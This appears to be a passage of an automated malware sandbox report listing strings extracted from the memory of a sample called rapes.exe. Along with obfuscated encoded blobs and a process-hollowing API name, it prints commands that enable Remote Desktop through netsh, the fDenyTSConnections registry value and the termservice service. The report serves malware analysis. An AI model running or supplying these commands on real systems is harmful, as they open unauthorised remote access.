0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exeString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000E.00000002.3640463719.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000E.00000002.3640463719.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 0000000E.00000003.1272781808.0000000004CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000E.00000003.1272781808.0000000004CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 00000016.00000003.1658838706.0000000004850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 00000016.00000003.1658838706.0000000004850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 00000016.00000002.1699111613.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 00000016.00000002.1699111613.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 00000019.00000002.2294441553.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 00000019.00000002.2294441553.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 00000019.00000003.2254111649.0000000004B00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 00000019.00000003.2254111649.0000000004B00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 